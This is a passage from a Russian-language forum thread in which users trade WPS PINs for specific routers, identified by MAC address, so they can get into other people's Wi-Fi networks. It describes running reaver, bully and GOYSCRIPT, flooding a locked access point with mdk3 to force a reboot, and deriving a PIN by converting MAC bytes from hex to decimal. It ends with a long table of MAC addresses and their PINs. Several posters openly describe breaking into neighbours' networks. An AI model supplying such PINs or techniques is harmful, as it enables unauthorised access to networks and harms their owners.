Чуть не забыл - при двойном клике по названию колонки происходит сортировка.
ТЫЦ
Vikhedgehog
21.05.2014, 15:53
Написал небольшую программку для поиска пинов и определения модели роутера.
http://i64.fastpic.ru/big/2014/0521/c2/aaf79e8c4f26bd4b5d1fbab67cb7a0c2.jpg
Работает просто. сканируем WPS командой Wash, выделяем мышкой строки и копируем в буфер обмена. Далее кликаем в программе по полю с вкладками 'BSSID Ch RSI ESSID' (активируем его) затем правый клик и выбираем 'Insert'. Должны вставиться скопированные данные. Далее:
одинарный клик по BSSID - генерирует команду reaver (из BSSID по которому кликали!!!)
двойной клик по BSSID - запускает поиск по BSSID (ищется сначала полный BSSID потом без последнего символа и т.д.) Если есть совпадения во втором поле выделится строка.
Ctrl+Del - Удалить Строку
Ins - Вставить пустую строку
Ctrl+x,Ctrl+c,Ctrl+v - вырезать, скопировать, вставить.
II - поле.
одинарный клик по BSSID - генерирует команду reaver (из BSSID по которому кликали!!!)
одинарный клик по PIN - генерирует команду reaver с этим пином
одинарный клик по BSSID-PIN - Выбирает что отнимать, прибавлять, или PIN постоянный (Необходимо снова кликнуть по BSSID)
Ctrl+Del - Удалить Строку
Ins - Вставить пустую строку
Ctrl+x,Ctrl+c,Ctrl+v - вырезать, скопировать, вставить.
Все изменения сохраняйте сами - программа при выходе не спрашивает!!!
У меня на Windows и back track 5 работает.
Чуть не забыл - при двойном клике по названию колонки происходит сортировка.
ТЫЦ
Есть возможность импортировать файл с результатами скана router scan в общую базу? Было бы очень полезной функцией
Stalker5
21.05.2014, 22:20
Написал небольшую программку для поиска пинов и определения модели роутера.
http://i64.fastpic.ru/big/2014/0521/c2/aaf79e8c4f26bd4b5d1fbab67cb7a0c2.jpg
Работает просто. сканируем WPS командой Wash, выделяем мышкой строки и копируем в буфер обмена. Далее кликаем в программе по полю с вкладками 'BSSID Ch RSI ESSID' (активируем его) затем правый клик и выбираем 'Insert'. Должны вставиться скопированные данные. Далее:
одинарный клик по BSSID - генерирует команду reaver (из BSSID по которому кликали!!!)
двойной клик по BSSID - запускает поиск по BSSID (ищется сначала полный BSSID потом без последнего символа и т.д.) Если есть совпадения во втором поле выделится строка.
Ctrl+Del - Удалить Строку
Ins - Вставить пустую строку
Ctrl+x,Ctrl+c,Ctrl+v - вырезать, скопировать, вставить.
II - поле.
одинарный клик по BSSID - генерирует команду reaver (из BSSID по которому кликали!!!)
одинарный клик по PIN - генерирует команду reaver с этим пином
одинарный клик по BSSID-PIN - Выбирает что отнимать, прибавлять, или PIN постоянный (Необходимо снова кликнуть по BSSID)
Ctrl+Del - Удалить Строку
Ins - Вставить пустую строку
Ctrl+x,Ctrl+c,Ctrl+v - вырезать, скопировать, вставить.
Все изменения сохраняйте сами - программа при выходе не спрашивает!!!
У меня на Windows и back track 5 работает.
Чуть не забыл - при двойном клике по названию колонки происходит сортировка.
ТЫЦ
Я надеюсь, свои BSSID можно добавлять?
Есть несколько, для коллекции.
VladimirV
21.05.2014, 22:48
Добавил кнопк 'Load CSV' - Загружает все найденные CSV файлы из папки программы.
Добавить можно вручную (F2 - редактировать ячейку) и скопировав в буфер из EXCEL.
saimonyz
23.05.2014, 22:09
мож кто знает пин на 64:70:02:FF:C1:FA TL-WR940N
fonsbonum
03.06.2014, 04:34
Помогите с пином -NETGAR C0:3F:0E:82:3C:29
в последнее время стало появляться много точек с essid типа "MGTS_GPON_9753"
производитель роутера:sercomm (wps включен)
mac начинается с 00:0E:8F (например,00:0E:8F:64:6D:BF)
кто-нибудь знает о пин коде wps или пароле на подобные сети?
заранее спасибо
А reaver ичпользовать не судьба? 191 страница и из них 150 с постами типа "кто знает пин?", народ, вы вардрайверы или где? Берите флешки, ставьте линухи, раздупляйте, ломайте, а то уже честное слово, всё "дайте", "скажите", а самим?
А reaver ичпользовать не судьба?
там после нескольких неудачных попыток лочится wps,reaverом придется несколько лет подбирать
Ааааа, ну да, про это я и забыл. Ну, можно попробовать флудить точку mdk3, пока не ребутнется, ребут сбрасывает лок. Можно ломать дальше. Я так тоже натыкался. Но чаще просто переводил внимание на другие точки, не заморачиваясь, благо, сейчас в каждой квартире стоит роутер, ибо у всех планшеты, телефоны, телевизоры и т.п. Если сеть типа ситилан, то можно попробовать посканить роутерсканом, если повезет, то он найдет этот роутер в сети, если пароль от админки стандартный, то он выдаст инфо и по пину и по ключу WPA. Пробуйте.
saimonyz
16.06.2014, 12:28
спрашиваю потому что точка в лок уходит
90:f6:52:5e:1f:d0
sotto
на точке есть wps, но reaver залупается.
кто-нибудь с пином поможет?
90:f6:52:5e:1f:d0
sotto
на точке есть wps, но reaver залупается.
кто-нибудь с пином поможет?
Это TP-LINK - он после 10 не верных пинов в лок уходит, а может и вообще авторизация по PIN быть отключена на аппарате, только по кнопке может работать авторизация WPS.
90:f6:52:5e:1f:d0
sotto
на точке есть wps, но reaver залупается.
кто-нибудь с пином поможет?
Те, которые не лочились 90:f6:52: по первой половине:
0215 ; 1065 ; 8182. Так, что шансов практически нет - пины совершенно разные.
mr.anonimus
26.06.2014, 12:04
в последнее время стало появляться много точек с essid типа "MGTS_GPON_9753"
производитель роутера:sercomm (wps включен)
mac начинается с 00:0E:8F (например,00:0E:8F:64:6D:BF)
кто-нибудь знает о пин коде wps или пароле на подобные сети?
заранее спасибо
Актуально. Сетей действительно много.
Точка лочиться.
Неужели ни кто еще не ломал?
Vikhedgehog
26.06.2014, 13:40
Актуально. Сетей действительно много.
Точка лочиться.
Неужели ни кто еще не ломал?
http://habrahabr.ru/post/188454/
Давно уже взломали.
mr.anonimus
26.06.2014, 13:46
http://habrahabr.ru/post/188454/
Давно уже взломали.
Эту статью я читал, но возможный пин там не написан.
Vikhedgehog
26.06.2014, 15:19
Эту статью я читал, но возможный пин там не написан.
13419622
В гугле второй результат после поста на хабре.
ESSID: C8:6C:87:40:BA:d5
WPS PIN реально высчитать?
Роутер Zyxel Keenetic Lite
binarymaster
01.07.2014, 03:00
ESSID: C8:6C:87:40:BA:d5
WPS PIN реально высчитать?
Роутер Zyxel Keenetic Lite
Попробуйте 42421337, скорее всего он.
Давно уже взломали.
сейчас стали ставить sercomm gpon rv6688,на них пароли другие-не номер домашнего телефона
13419622
В гугле второй результат после поста на хабре.
он только для zte подходит,от которых мгтс уже отказалась
ESSID: C8:6C:87:40:BA:d5
WPS PIN реально высчитать?
Роутер Zyxel Keenetic Lite
GOYSCRIPT WPS c такими C8:6C:87 справляется за две минуты.
GOYSCRIPT WPS c такими C8:6C:87 справляется за две минуты.
Стенд: kali linux 1.0.7, reaver\bully\wifite, tplink wn722 и мощность всего 20 дб. Час сидел, ничего. Закономерный вопрос - что я делаю не так?
Стенд: kali linux 1.0.7, reaver\bully\wifite, tplink wn722 и мощность всего 20 дб. Час сидел, ничего. Закономерный вопрос - что я делаю не так?
Всё не так. Так можно сидеть и дальше. Со временем пин подберется. Но когда это время настанет... Может через пару дней... и более.
GOYSCRIPT в помощь. На kali наверное его нету и надо отдельно ставить. kali не пользуюсь. В wifislax уже встроен. Все Zyxel которые попадались он достаточно быстро подбирает пин и выдает пароль.
какой пин wps может быть у точки?
zyxel keenetic
mac:EC:43:F6:08:EC:E4
binarymaster
08.07.2014, 23:37
какой пин wps может быть у точки?
zyxel keenetic
mac:EC:43:F6:08:EC:E4
05849321
помогите еще с
EE:43:F61:5F:50
(тоже keenetic)
binarymaster
09.07.2014, 23:28
помогите еще с
EE:43:F61:5F:50
(тоже keenetic)
37214241
37214241
спасибо,а то я переводил в калькуляторе получалось 13721424
henri2002
10.07.2014, 01:41
спасибо,а то я переводил в калькуляторе получалось 13721424
так единичку надо отбрасывать, а контрольную цифру ривер подставит сам.
VladimirV
17.07.2014, 01:08
Наткнулся на локалку (в командеровке), а в ней из 100 пасов 30-40 pin WPS.
Перебор 8 циферок долго, хочу сделать паслист из пинов.
Нужен алгоритм получения контрольной суммы в Pin (Восьмого символа в Pin).
binarymaster
17.07.2014, 01:47
Наткнулся на локалку (в командеровке), а в ней из 100 пасов 30-40 pin WPS.
Перебор 8 циферок долго, хочу сделать паслист из пинов.
Нужен алгоритм получения контрольной суммы в Pin (Восьмого символа в Pin).
Думаю, мой скрипт поможет:
http://forum.antichat.ru/showthread.php?p=3691143-wpspin.py#post3691143
Можно его модифицировать, чтобы список всех возможных пинов сгенерировал.
VladimirV
17.07.2014, 01:57
Думаю, мой скрипт поможет:
http://forum.antichat.ru/showthread.php?p=3691143-wpspin.py#post3691143
Можно его модифицировать, чтобы список всех возможных пинов сгенерировал.
Спасибо! Сейчас попробую разобраться (Придется поучить ПИТОН).
Если есть возможность выложить словарик буду благодарен!
Я разобрался. Спасибо!
28:28:5D:69:64:00
Кто что скажет?
Спасибо! Сейчас попробую разобраться (Придется поучить ПИТОН).
Если есть возможность выложить словарик буду благодарен!
Я разобрался. Спасибо!
Есть возможность выложить этот словарь?
VladimirV
19.07.2014, 03:47
Есть возможность выложить этот словарь?
Кинул сюда http://forum.antichat.ru/showpost.php?p=3744095&postcount=458
mac:00:0e:8f:0f:3b:78
серийный номер:SF1312F24F79
wps пин:29840786
или вот
mac адрес:00:0e:8f:d4:2b:d0
wps пин:99856816
это beeline smartbox (sercomm)....такие же роутеры втюхивает мгтс со своим gponом.....может кто-то связь найдет? или пины генерятся рандомно?
1.http://i67.fastpic.ru/big/2014/0720/bc/d879ca24b313a03aa2f381150b097dbc.jpg
2.http://i66.fastpic.ru/big/2014/0720/4b/796ca8428148a55ade1aff3a1ae2c64b.jpg
Vikhedgehog
20.07.2014, 14:12
mac:00:0e:8f:0f:3b:78
серийный номер:SF1312F24F79
wps пин:29840786
или вот
mac адрес:00:0e:8f:d4:2b:d0
wps пин:99856816
это beeline smartbox (sercomm)....такие же роутеры втюхивает мгтс со своим gponом.....может кто-то связь найдет? или пины генерятся рандомно?
У меня есть доступ у такому же, тк хозяин поменял WPA пароль на очень слабый. Нашел WPS пин код в настройках, но когда проверяю с reaver'ом - нет M5, M6 и M7, то есть похоже что по умолчанию WPS не настроен и не выдает PSK даже при верном PIN'е. Было бы интересно, если б кто-то проверил на своем smart box'е.
А вообще, пины никогда не могут генерироваться рандомно, тк роутер - это устройство и оно может только следовать алгоритму. Но вот производители поумнели и стали делать извороченные алгоритмы, чтоб никто так просто в роутеры не влезал. Помню, что кто-то пробовал разбирать прошивки с IDA PRO, но без результатов, наверное там этот алгоритм так просто еще не найдешь. Немцы вот на своих форумах разбирают прошивки провайдерских ADSL роутеров и находят алгоритмы, там правда они сразу ищут как вычислить стандартный WPA-PSK, тк от wps там уже почти все провайдеры отказались. Но на такую геморройную работу у них уходят месяцы
производители поумнели и стали делать извороченные алгоритмы
....и только zyxel со своим keeneticом плевал на все это
А вообще, пины никогда не могут генерироваться рандомно, тк роутер - это устройство и оно может только следовать алгоритму. Но вот производители поумнели и стали делать извороченные алгоритмы, чтоб никто так просто в роутеры не влезал. Помню, что кто-то пробовал разбирать прошивки с IDA PRO, но без результатов, наверное там этот алгоритм так просто еще не найдешь. Немцы вот на своих форумах разбирают прошивки провайдерских ADSL роутеров и находят алгоритмы, там правда они сразу ищут как вычислить стандартный WPA-PSK, тк от wps там уже почти все провайдеры отказались. Но на такую геморройную работу у них уходят месяцы
Смотря в каких роутерах. Те же самые D-Link'и не меняют алгоритмов годами. Тогда как к примеру Yota Devices (Many, итд.) в каждых партиях разные прошивки на одно и то же устройство. И как следствие (скорей всего) - алгоримы.
....и только zyxel со своим keeneticом плевал на все это
Ничего подобного. По соседству 3 кинетика: и только один Bully вскрыл минут за 30. Остальные просто лочат. И mdk3 не помогает.
D-Link'и не меняют алгоритмов годами.
какой же у них алгоритм?
Ничего подобного.
а как же метод hex to dec?
Vikhedgehog
21.07.2014, 02:38
какой же у них алгоритм?
У D-Link DSL_2640NRU и DSL_2650NRU одинаковые коды у всех:
46264848
31957199
Еще есть, которые ща не помню
А вот про алгоритм у DIR-300 было бы интересно услышать, хотя их осталось уже мало (есть конечно ревизия B7, но она отстой и wps там, насколько знаю, выключен)
Да узнать бы этот алгоритм.
У меня DIR_300NRU5 не принимает даже свой pin 80965244
Использовал reaver,bully
Может кто подгенерировать пин кодов под мак a0:f3:c1:fd:d5:74 (тп линк 741)?? Ривер с булли не помог, точка ушла в себя после 10 попыток, и до сих пор не вышла.
Может кто подгенерировать пин кодов под мак a0:f3:c1:fd:d5:74 (тп линк 741)?? Ривер с булли не помог, точка ушла в себя после 10 попыток, и до сих пор не вышла.
Гиблое дело. пока никак не генерируется максимум что можно сделать это поставить функцию L в reaver е это даст до 18 пинов перебрать за раз.
Может кто обьяснить, как считается контрольная цифра у пин кода? Нужно сгенерировать к коду 4318168
henri2002
30.07.2014, 22:45
Может кто обьяснить, как считается контрольная цифра у пин кода? Нужно сгенерировать к коду 4318168
43181681
как генерируется не знаю, но в теме по словарям выкладывали все возможные сгенирорванные пины.
Может кто подгенерировать пин кодов под мак a0:f3:c1:fd:d5:74 (тп линк 741)?? Ривер с булли не помог, точка ушла в себя после 10 попыток, и до сих пор не вышла.
http://forum.antichat.ru/showpost.php?p=3705146&postcount=1860
После такого трюка точка зависла намертво. И не появлялась в эфире до тех пор, пока хозяин, судя по всему, её не перезагрузил. После каждого лока такое делать не вариант, так как кроме палева, точкой пользуются вечером и то не каждым, то есть можно отправить роутер в аут на пару дней.
Stranger@
02.08.2014, 11:58
Месяц назад взломал одну точку TP-LINK с помощью WPS(противостояние длилось 2 месяца), но хозяин недавно выключил WPS и его сеть сейчас стала без названия(видна, как Другие сети и при подключении просит ещё ввести название сети? Есть возможность узнать?
Месяц назад взломал одну точку TP-LINK с помощью WPS(противостояние длилось 2 месяца), но хозяин недавно выключил WPS и его сеть сейчас стала без названия(видна, как Другие сети и при подключении просит ещё ввести название сети? Есть возможность узнать?
Названия сети не запомнили?
про скрытый SSID тут: https://forum.antichat.ru/showpost.php?p=3745673&postcount=7875
Люди добрые начал читать со 195 странице в начало, но пока не нашел ответ на свой вопрос. Просвятите приз как по маку точки вы так быстро вычисляете её пароль, сорри если 100 было, тыкните носом.
Переводом второй части мака с шестнадцатиричной системы счисления в десятичную. Работает далеко не на всех точках.
VladimirV
04.08.2014, 17:28
Мои ПИНЫ
80:1F:02:4F:39:A8 8746536 +3554432
80:1F:02:4A:39:B4 8418868 +3554432
80:1F:02:12:E8:EC 4793708 +3554432
80:1F:02:3A:7C:7A 7387386 +3554432
80:1F:02:49:15:BE 8344126 +3554432
80:1F:02:49:1A:10 8345232 +3554432
80:1F:02:4F:28:7C 8742140 +3554432
80:1F:02:4F:27:F4 8742004 +3554432
80:1F:02:12:E9:2E 4793774 +3554432
80:1F:02:12:EA:DA 4794202 +3554432
80:1F:02:4A:3F:4C 8420300 +3554432
80:1F:02:4F:39:2A 8746410 +3554432
80:1F:02:36:E1:92 7151122 +3554432
80:1F:02:19:0C:CA 5196106 +3554432
80:1F:02:12:EA:EC 4794220 +3554432
80:1F:02:0E:02:C4 4472644 +3554432
80:1F:02:2B:72:52 6401746 +3554432
80:1F:02:27:91:52 6147538 +3554432
80:1F:02:26:62:DF 6070111 +3554432
80:1F:02:0A:0C:F6 4213110 +3554432
80:1F:02:0E:10:B0 4476208 +3554432
80:1F:02:2E:93:E2 6606946 +3554432
80:1F:02:12:EA:DC 4794204 +3554432
80:1F:02:07:0F:EA 4017258 +3554432
80:1F:02:0E:0B:4A 4474826 +3554432
80:1F:02:2B:72:52 6401746 +3554432
80:1F:02:5E:6B:7E 9742334 +3554432
80:1F:02:4F:3D:BE 8747582 +3554432
00:66:4B:2A:67:A0 2779044 +4
08:7A:4C:25:44:70 2442356 +4
00:66:4B:3A:2F:70 3813236 +4
08:7A:4C:24:66:A0 2385572 +4
00:66:4B:3A:32:F0 3814132 +4
2C:AB:25:57:F2:55 6520661 +756992
2C:AB:25:54:E3:0B 6320139 +756992
2C:AB:25:55:1D:FF 6335231 +756992
2C:AB:25:5A:F8:DD 6718941 +756992
2C:AB:25:69:BD:FE 7686910 +756992
2C:AB:25:61:CE:0F 7166735 +756992
2C:AB:25:61:50:AE 7134638 +756992
2C:AB:25:3D:C7:FD 4805885 +756992
2C:AB:25:0B:74:24 1507620 +756992
2C:AB:25:0F:98:0A 1778954 +756992
2C:AB:25:0F:9C:BE 1780158 +756992
00:66:4B:39:C6:50 3786328 +8
00:66:4B:2A:66:C0 2778824 +8
84:C9:B2:CD:C2:CC 1086411 =1086411
00:1A:A9:C6:6F:28 1086411 =1086411
28:10:7B:99:6D:AD 1227918 =1227918
B8:A3:86:44:D8:5E 1227918 =1227918
B0:48:7A:D5:39:B0 1234567 =1234567
B0:48:7A:DF:33:EE 1234567 =1234567
B0:48:7A:D8:13:00 1234567 =1234567
90:F6:52:89:EB:10 1234567 =1234567
90:F6:52:8A:1F:E2 1234567 =1234567
90:F6:52:8A:36:2A 1234567 =1234567
F4:EC:38:E8:C4:CA 1234567 =1234567
B0:48:7A:A6:8E:AC 1234567 =1234567
F8:D1:11:92:22:3A 1234567 =1234567
C8:D3:A3:E6:3A:82 1708421 =1708421
C8:D3:A3:E6:69:2F 1708421 =1708421
C8:D3:A3:E6:1C:E5 1708421 =1708421
C8:D3:A3:E6:14:21 1708421 =1708421
C8:D3:A3:E6:14:48 1708421 =1708421
C8:D3:A3:E6:78:47 1708421 =1708421
C8:D3:A3:E6:C6:B3 1708421 =1708421
C8:D3:A3:E6:E1:3E 1708421 =1708421
C8:D3:A3:E6:B9:7B 1708421 =1708421
C8:D3:A3:E6:79:76 1708421 =1708421
C8:D3:A3:E6:AF:C1 1708421 =1708421
C8:D3:A3:DA:6B:32 1708421 =1708421
C8:D3:A3:DA:CE:AA 1708421 =1708421
C8:D3:A3:DA:D8:0D 1708421 =1708421
C8:D3:A3:DA:10:51 1708421 =1708421
C8:D3:A3:DA:10:96 1708421 =1708421
C8:D3:A3:DA:21:64 1708421 =1708421
C8:D3:A3:DA:E3:50 1708421 =1708421
C8:D3:A3:DB:30:AB 1708421 =1708421
C8:D3:A3:DB:36:6C 1708421 =1708421
C8:D3:A3:E6:0E:75 1708421 =1708421
C8:D3:A3:DB:04:D7 1708421 =1708421
C8:D3:A3:DB:2B:71 1708421 =1708421
C8:D3:A3:DB:2C:6A 1708421 =1708421
84:C9:B2:CC:13:CB 1883648 =1883648
84:C9:B2:CB:F7:AE 3195719 =3195719
BC:F6:85:4C:D1:E8 3195719 =3195719
84:C9:B2:CC:19:23 3195719 =3195719
1C:7E:E5:0D:4A:D0 3195719 =3195719
80:1F:02:4F:27:D8 3561153 =3561153
80:1F:02:4F:27:CC 3561153 =3561153
80:1F:02:4F:40:98 3561153 =3561153
80:1F:02:0E:03:C4 3561153 =3561153
80:1F:02:5E:6B:D6 3561153 =3561153
80:1F:02:3A:7D:62 3561153 =3561153
80:1F:02:3A:7C:54 3561153 =3561153
80:1F:02:3A:7C:2A 3561153 =3561153
80:1F:02:3A:7E:BE 3561153 =3561153
28:10:7B:9E:E8:AF 4626484 =4626484
28:10:7B:9D:B5:44 4626484 =4626484
28:10:7B:9E:B9:D2 4626484 =4626484
28:10:7B:9E:11:15 4626484 =4626484
28:10:7B:9E:05:2D 4626484 =4626484
FC:75:16:CF:E1:6B 4626484 =4626484
FC:75:16:CF:BA:A7 4626484 =4626484
FC:75:16:CF:A9:04 4626484 =4626484
FC:75:16:CF:E2:AF 4626484 =4626484
FC:75:16:D0:0F:40 4626484 =4626484
FC:75:16:D0:15:40 4626484 =4626484
FC:75:16:CF:E5:76 4626484 =4626484
28:10:7B:9D:91:D1 4626484 =4626484
84:C9:B2:F1:01:87 4626484 =4626484
84:C9:B2:F1:02:AD 4626484 =4626484
84:C9:B2:F0:F5:0F 4626484 =4626484
84:C9:B2:F0:FD:67 4626484 =4626484
84:C9:B2:F1:24:46 4626484 =4626484
84:C9:B2:F1:27:CA 4626484 =4626484
84:C9:B2:F1:06:CA 4626484 =4626484
84:C9:B2:F1:13:FF 4626484 =4626484
84:C9:B2:F0:F3:0E 4626484 =4626484
84:C9:B2:EE:E7:C0 4626484 =4626484
84:C9:B2:F0:A9:76 4626484 =4626484
84:C9:B2:EE:96:C3 4626484 =4626484
84:C9:B2:EE:9E:9D 4626484 =4626484
84:C9:B2:F0:CF:3B 4626484 =4626484
84:C9:B2:F0:ED:1D 4626484 =4626484
84:C9:B2:F0:B2:49 4626484 =4626484
84:C9:B2:F0:CF:32 4626484 =4626484
28:10:7B:31:3B:12 4626484 =4626484
1C:7E:E5:09:EC:7D 4626484 =4626484
1C:7E:E5:B2:56:62 4626484 =4626484
28:10:7B:31:15:BC 4626484 =4626484
28:10:7B:32:B8:3C 4626484 =4626484
28:10:7B:3A:5C:09 4626484 =4626484
1C:7E:E5:09:DC:E7 4626484 =4626484
28:10:7B:31:56:F0 4626484 =4626484
84:C9:B2:F1:7F:5D 4626484 =4626484
84:C9:B2:F1:46:C3 4626484 =4626484
84:C9:B2:F1:4A:CB 4626484 =4626484
84:C9:B2:F1:3A:66 4626484 =4626484
84:C9:B2:F1:3D:96 4626484 =4626484
84:C9:B2:F1:77:2F 4626484 =4626484
84:C9:B2:F1:78:94 4626484 =4626484
84:C9:B2:F1:5B:51 4626484 =4626484
84:C9:B2:F1:62:11 4626484 =4626484
84:C9:B2:EE:96:60 4626484 =4626484
B8:A3:86:46:CE:93 4626484 =4626484
B8:A3:86:48:80:C7 4626484 =4626484
B8:A3:86:44:0E:B0 4626484 =4626484
B8:A3:86:46:C5:DB 4626484 =4626484
1C:7E:E5:EE:C3:6D 4626484 =4626484
BC:F6:85:4C:01:11 4626484 =4626484
1C:7E:E5:F1:F9:04 4626484 =4626484
1C:7E:E5:F1:F4:33 4626484 =4626484
B8:A3:86:43:BC:06 4626484 =4626484
B8:A3:86:32:51:CB 4626484 =4626484
B8:A3:86:3D:06:C4 4626484 =4626484
B8:A3:86:32:1B:44 4626484 =4626484
B8:A3:86:32:34:F1 4626484 =4626484
B8:A3:86:43:67:6D 4626484 =4626484
B8:A3:86:43:89:8A 4626484 =4626484
B8:A3:86:40:8D:2D 4626484 =4626484
B8:A3:86:43:64:46 4626484 =4626484
84:C9:B2:CA:10:90 4626484 =4626484
84:C9:B2:EE:5F:04 4626484 =4626484
84:C9:B2:CA:08:C5 4626484 =4626484
84:C9:B2:CA:0B:D1 4626484 =4626484
84:C9:B2:EE:74:5E 4626484 =4626484
84:C9:B2:EE:7F:2F 4626484 =4626484
84:C9:B2:EE:6E:A0 4626484 =4626484
84:C9:B2:EE:73:26 4626484 =4626484
84:C9:B2:CA:08:9B 4626484 =4626484
BC:F6:85:4C:3E:CA 4626484 =4626484
1C:7E:E5:B6:A4:B9 4626484 =4626484
BC:F6:85:4C:0E:C4 4626484 =4626484
BC:F6:85:4C:18:66 4626484 =4626484
1C:7E:E5:B3:B6:2F 4626484 =4626484
1C:7E:E5:B3:A1:64 4626484 =4626484
1C:7E:E5:B6:3E:E5 4626484 =4626484
1C:7E:E5:B5:D9:6F 4626484 =4626484
28:10:7B:3B:68:F5 4626484 =4626484
28:10:7B:3B:68:B3 4626484 =4626484
28:10:7B:3B:85:F3 4626484 =4626484
28:10:7B:3B:B4:DF 4626484 =4626484
28:10:7B:3B:8C:74 4626484 =4626484
28:10:7B:3B:65:32 4626484 =4626484
28:10:7B:3A:DF:B2 4626484 =4626484
CC:B2:55:F7:C2:3D 4626484 =4626484
28:10:7B:3B:4E:FD 4626484 =4626484
28:10:7B:3B:55:84 4626484 =4626484
28:10:7B:3B:50:1A 4626484 =4626484
CC:B2:55:30:D2:BD 4626484 =4626484
CC:B2:55:30:D3:2C 4626484 =4626484
28:10:7B:98:9F:AF 4626484 =4626484
1C:7E:E5:09:AB:46 4626484 =4626484
28:10:7B:98:E0:1D 4626484 =4626484
28:10:7B:98:77:17 4626484 =4626484
28:10:7B:9C:49:51 4626484 =4626484
28:10:7B:94:59:F6 4626484 =4626484
28:10:7B:99:6D:FE 4626484 =4626484
C8:BE:19:80:2C:54 4626484 =4626484
28:10:7B:99:61:95 4626484 =4626484
28:10:7B:3A:B7:20 4626484 =4626484
28:10:7B:3A:71:66 4626484 =4626484
28:10:7B:3A:5C:84 4626484 =4626484
28:10:7B:3A:C9:C2 4626484 =4626484
28:10:7B:3A:7F:D3 4626484 =4626484
28:10:7B:9C:8A:49 4626484 =4626484
28:10:7B:3A:AE:8C 4626484 =4626484
28:10:7B:3A:9E:66 4626484 =4626484
CC:B2:55:FB:A6:50 4626484 =4626484
CC:B2:55:F7:F4:CE 4626484 =4626484
84:C9:B2:CB:FD:F6 6232714 =6232714
84:C9:B2:ED:9E:FD 6232714 =6232714
84:C9:B2:ED:BC:B1 6232714 =6232714
1C:7E:E5:B5:B0:9E 6232714 =6232714
84:C9:B2:CB:F8:9B 6232714 =6232714
14:D6:4D:9C:BA:3F 6232714 =6232714
C8:D3:A3:C0:5A:B0 6232714 =6232714
C8:D3:A3:C0:4E:C5 6232714 =6232714
FC:75:16:D4:04:13 6232714 =6232714
28:10:7B:98:9E:FB 6232714 =6232714
C8:D3:A3:C0:49:BE 6232714 =6232714
C8:D3:A3:C0:66:59 6232714 =6232714
FC:75:16:D1:7D:77 6232714 =6232714
84:C9:B2:C4:F5:36 6232714 =6232714
1C:7E:E5:B3:B3:4F 6232714 =6232714
CC:B2:55:24:90:C5 6232714 =6232714
CC:B2:55:FA:32:70 6232714 =6232714
FC:75:16:D1:64:9C 6232714 =6232714
FC:75:16:D1:6F:94 6232714 =6232714
B8:A3:86:43:4D:45 6232714 =6232714
FC:75:16:D1:7D:14 6232714 =6232714
1C:7E:E5:B4:09:83 7622990 =7622990
1C:7E:E5:B3:B2:E7 7622990 =7622990
1C:7E:E5:EE:A0:6D 7622990 =7622990
1C:7E:E5:B4:20:BF 7622990 =7622990
1C:7E:E5:B3:F4:4F 7622990 =7622990
1C:7E:E5:B4:2A:4B 7622990 =7622990
1C:7E:E5:EE:90:B5 7622990 =7622990
1C:7E:E5:B4:23:37 7622990 =7622990
1C:7E:E5:ED:F9:15 7622990 =7622990
28:10:7B:9E:32:FC 7622990 =7622990
CC:B2:55:FB:7E:E1 7622990 =7622990
FC:75:16:CF:CA:28 7622990 =7622990
FC:75:16:CF:BC:F3 7622990 =7622990
28:10:7B:3B:59:BC 7622990 =7622990
B8:A3:86:43:53:06 7622990 =7622990
62:A3:86:46:E9:88 7622990 =7622990
CC:B2:55:F7:C0:3F 7622990 =7622990
28:10:7B:3B:20:4D 7622990 =7622990
CC:B2:55:33:5F:98 7622990 =7622990
B8:A3:86:43:E3:54 7622990 =7622990
B8:A3:86:43:DD:90 7622990 =7622990
CC:B2:55:33:00:3D 7622990 =7622990
28:10:7B:94:79:F4 7622990 =7622990
CC:B2:55:F8:05:00 7622990 =7622990
1C:7E:E5:AF:56:87 7622990 =7622990
CC:5D:4E:5B:CA:5A 6015578 0
CC:5D:4E:50:E8:AC 5302444 0
C8:3A:35:2A:DB:88 2808712 0
00:21:91:04:1E:55 0269909 0
BC:AE:C5:7E:A7:8C 8300428 0
BC:AE:C5:7E:A5:50 8299856 0
D4:6E:5C:5D:3C:60 6110304 0
08:7A:4C:24:66:70 2385520 0
B0:B2:DC:5C:E6:A0 6088352 0
08:7A:4C:0D:6F:A0 0880544 0
00:1E:58:2D:BE:8B 2997899 0
CC:5D:4E:5B:CA:5A 6015578 0
00:1E:58:23:4C:3B 2313275 0
00:21:91:04:1F:DD 0270301 0
CC:5D:4E:5B:CB:84 6015876 0
FC:F5:28:48:AA:B2 4762290 0
C8:3A:35:5D:35:08 6108424 0
34:08:04:12:EC:1C 1240092 0
FE:F5:28:48:C1:B0 4768176 0
CC:5D:4E:4E:01:BA 5112250 0
CC:5D:4E:4E:01:BA 5112250 0
C8:3A:35:52:89:48 5409096 0
34:08:04:12:EC:1C 1240092 0
00:66:4B:3A:34:20 3814432 0
00:66:4B:3A:35:C0 3814848 0
FC:75:16:42:C6:3C 4376124 0
00:66:4B:2A:67:20 2778912 0
C8:6C:87:72:9B:84 7510916 0
C8:6C:87:40:60:83 4219011 0
C8:6C:87:3F:DE:89 4185737 0
CC:5D:4E:4E:D4:28 5166120 0
CC:5D:4E:4E:71:0E 5140750 0
EA:6C:87:3E:B5:70 4109680 0
EC:43:F6:06:85:88 0427400 0
EC:43:F6:02:55:08 0152840 0
C8:3A:35:55:D3:B1 5624752 -1
C8:3A:35:55:D3:B9 5624760 -1
C8:3A:35:21:C5:11 2213136 -1
C8:3A:35:55:D2:89 5624456 -1
C8:3A:35:21:C7:A1 2213792 -1
C8:3A:35:42:02:29 4325928 -1
C8:3A:35:41:F3:91 4322192 -1
C8:3A:35:21:EC:01 2223104 -1
C8:3A:35:42:05:11 4326672 -1
C8:3A:35:21:C5:01 2213120 -1
C8:3A:35:06:AA:B1 0436912 -1
C8:3A:35:06:A9:A9 0436648 -1
C8:3A:35:06:A9:09 0436488 -1
C8:3A:35:06:B0:F9 0438520 -1
C8:3A:35:06:B6:F1 0440048 -1
C8:3A:35:06:B4:39 0439352 -1
C8:3A:35:06:B3:21 0439072 -1
C8:3A:35:06:A5:B9 0435640 -1
C8:3A:35:06:BA:11 0440848 -1
C8:3A:35:06:B8:79 0440440 -1
C8:3A:35:55:CE:D9 5623512 -1
C8:3A:35:06:C5:79 0443768 -1
C8:3A:35:42:08:69 4327528 -1
C8:3A:35:06:A4:29 0435240 -1
90:E6:BA:BE:E0:17 2509207 -10000000
90:E6:BA:BE:FD:BE 2516798 -10000000
90:E6:BA:BE:D3:09 2505865 -10000000
90:E6:BA:BE:DD:08 2508424 -10000000
90:E6:BA:BE:EA:08 2511752 -10000000
90:E6:BA:BE:E2:83 2509827 -10000000
90:E6:BA:BE:E0:94 2509332 -10000000
90:E6:BA:BE:E2:3C 2509756 -10000000
